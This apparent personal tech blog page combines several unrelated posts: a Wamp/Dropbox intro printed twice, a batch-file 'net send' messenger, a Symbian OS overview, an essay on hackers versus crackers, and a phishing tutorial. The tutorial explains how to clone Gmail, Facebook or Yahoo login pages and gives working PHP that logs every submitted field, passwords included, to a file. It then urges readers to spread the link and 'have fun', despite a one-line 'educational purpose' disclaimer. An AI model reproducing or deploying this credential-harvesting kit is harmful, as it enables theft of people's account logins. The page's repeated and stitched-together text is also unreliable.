No doubt PHP is the best tool a web developer can have and if you develop applications on Windows you must have heard of Wamp Server. (Those who don't know Wamp let me tell you it can setup your local environment in minutes to start developing your applications). There are many tasks we used to repeat daily or many times a day.
We used to write code for websites or web apps on daily basis but the code we develop need to be backed up or uploaded to some backup server. Which wastes a lot of time. We can save this time by using dropbox.
No doubt PHP is the best tool a web developer can have and if you develop applications on Windows you must have heard of Wamp Server. (Those who don't know Wamp let me tell you it can setup your local environment in minutes to start developing your applications). There are many tasks we used to repeat daily or many times a day.
0 Comments
1) All you need is your friend's IP Address and your Command Prompt. 2) Open Notepad and write this code as it is.....! @echo off :A Cls echo MESSENGER set /p n=User: set /p m=Message: net send %n% %m% Pause Goto A 3) Now save this as "Messenger.Bat". 4) Open Command Prompt. 5) Drag this file (.bat file) over to Command Prompt and press Enter. 6) You would then see something like this: 7) Now, type the IP Address of the computer you want to contact and press enter You will see something like this: 8) Now all you need to do is type your message and press Enter. Start Chatting...& Have Fun..!!! What is Symbian Operating System?
Symbian Operating System, which is also known as Symbian OS is designed for the mobile phone environment. It addresses constraints of mobile phones by providing a framework to handle low memory situations, a power management model, and a rich software layer implementing industry standards for communications, telephony and data rendering. Symbian Operating System is designed for the mobile phone environment. It addresses constraints of the mobile phones by providing a framework to handle the low memory situations, a power management model, and a rich software layer implementing industry standards for the communications, telephony and the data rendering. Even with these abundant features, Symbian Operating System puts no constraints on the integration of other peripheral hardware. This flexibility allows the handset manufacturers to pursue innovative and the original designs. Symbian Operating System is proven on several platforms. It started life as the operating system for the Psion series of the consumer PDA products and the various adaptations by Diamond, Oregon Scientific and the Ericsson. The first dedicated mobile phone incorporating Symbian Operating System was the Ericsson R380 Smartphone, which incorporated a flip open keypad to reveal a touch screen display and several connected applications. Most recently available is the Nokia 9210 Communicator, a mobile phone that has a QWERTY keyboard and the color display, and is fully open to the third party applications written in Java or C++. The five key points such as small mobile devices, mass-market, intermittent wireless connectivity, diversity of products and an open platform for the independent software developers which are the premises on which Symbian Operating System was designed and developed. This makes it distinct from any desktop, work station or server operating system. This also makes Symbian Operating System different from the embedded operating systems, or any of its competitors, which weren't designed with all these key points in the mind. Symbian is committed to the open standards. Symbian Operating System has a POSIX compliant interface and a Sun approved JVM, and the company is actively working with the emerging standards, such as the J2ME, Bluetooth, MMS, SyncML, IPv6 and WCDMA. As well as its own developer support organization, books, papers and courses, Symbian delivers a global network of third party competency and training centers, the Symbian Competence Centers and the Symbian Training Centers. These are specifically directed at enabling other organizations and developers to take part in this new economy. Symbian has announced and implemented a strategy that will see Symbian Operating System running on many advanced open mobile phones. NB: This is just for educational purpose, don't use it for any criminal activity or any violation.
1. Go to web browser(eg. Mozilla Firefox, IE, Opera, Safari, Maxthon, Chrome etc. ), open Gmail/Facebook/Yahoo! login page. 2. Right click and open source & copy it into notepad, save with any name with .htm/.html extension. 3. Find the action="http://mail.gmail.com" change it to action="redirect.php" & save it. 4. Copy the code given below & save it as 'redirect.php' <?php header ('Location: http://www.mail.gmail.com'); $handle = fopen("log.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?> 4. Create another text file named 'log.txt' 5. Now upload these three files to an file sharing site (eg. www.webs.com etc.) & spread the link. 6. Have fun!!!!!! What is A Hacker?
A hacker is known to build things, solve problems and not break or crack any system. The computer industry initially hired good programmers to make sure how to full proof their system. However, over the years, the media, journalism and writers have played a very important role in changing the real meaning of the word hacker. They themselves are very confused in the term Hacker and a Cracker. A typical definition of a Hacker, that today comes to you mind is that a Hacker, is a person who tries to gain unauthorized access to any property and computers. The term Hacker came as slang from the computer world. So, different people have given different definitions to it. But what remains the common point is, that whenever you hear the word hacker, the first think that comes to your mind is always negative and bad. However, the real meaning of a hacker is a programmer who really finds it thrilling to learn more about it, who likes to explore more details about the programming language and hence stretches his or her capabilities more than any average person. Crackers are people who get cheap thrill out of cracking computer codes, and breaking into systems. Hence, these are the people who have negativity around them and they only believe in breaking or cracking an access to any kind of system that they have no authorization to. They are malicious annoying people who try to uncover sensitive information by poking their unwanted nose everywhere. Hackers on the other hand are knowledgeable and responsible people. They like to take intellectual challenges and like to overcome all limitations that are there in a particular system. Learning to hack is not very easy. It is a special gift that is only given to a selected few. Only people who are good in searching and keeping themselves updated about the latest technology are the one who are blessed with it. Only being good with computers does not qualify one to be a good hacker. Some people also reapply their hacking knowledge to different fields like music and electronic. It is also said the every hacker is independent of any kind of hack he does, call it in the computer field or elsewhere. Hackers are known to be ethical, wise in their practice. The realty is: 'Hackers build things, crackers break them.' Today the hacker world has been given 3 different names. The White hat hackers, who do all the good things and are positively motivated people, Then we have the Black hat hackers also called the crackers who are usually into negative work of cracking and breaking into someone's system and finally the third and the last are the grey hat hackers who explore the best of both the worlds. To conclude, we can say that Hackers are people who are skilled programmers that work for a positive cause or a goal, either for themselves or for an organization which could be private as in an industry or for the government. ›Thinking of A Hacker The thinking of a hacker is very much the same as that of a good program developer. Hackers who have been successful have developed a common strategy over a period of time. This strategy is to very patiently and carefully document every step, which is what the programmers do. They are good at analyzing and following a methodical approach of investigation. So when they start they don't have much as in the background, they start from the starch and gradually build what is called the entire roadmap or game plan. It is a known fact that in order to think like a master hacker one should imitated all the big hackers both intellectually and emotionally. As they always work on a different platform and it is the platform of Self Belief. 1. The typical thinking of a Hacker is that, they believe that the world is full of ongoing problems which continuously need solutions to it. So looking for solutions should be the ultimate aim and not giving up till the time the problem is cracked. 2. Another fundamental that they work on is that, the same wheel should not be invented twice as it will be a waste of time and effort both. Brains with creativity should be used for new proposes and not older ones. So, they believe in the theory that time is precious and make the best out of it. 3. The third fundamental truth that they believe in is that, repetition is what leads to success and no word like boredom can be found in their dictionary. 4. The next good thing they believe in is Freedom. Most of the hackers work independently and that is a strong foundation for them to grow. It is said that freedom has no limit to the growth of an individual. 5. No replacement for a good attitude. An attitude to fight and not flight. One can give up whenever he or she wants. It is only the attitude that makes you different from the other. 6. Hackers believe in a value system that is not negotiable and do not compromise on it, because if they do then they would be crackers and not hackers. Documentation is said to be the wisest thing that any developer a simple programmer or a hacker maintains. At times finding solutions is so difficult that is only the documentation that can help one understand the entire process all over again. It is like hunting for a treasure hunt in a jungle with small clues that take you to the next clue and one step closer to the final gift. |
Saumen Das
B.Tech. (Software Engineer), Archives
February 2015
Categories
All
Help Us To Grow |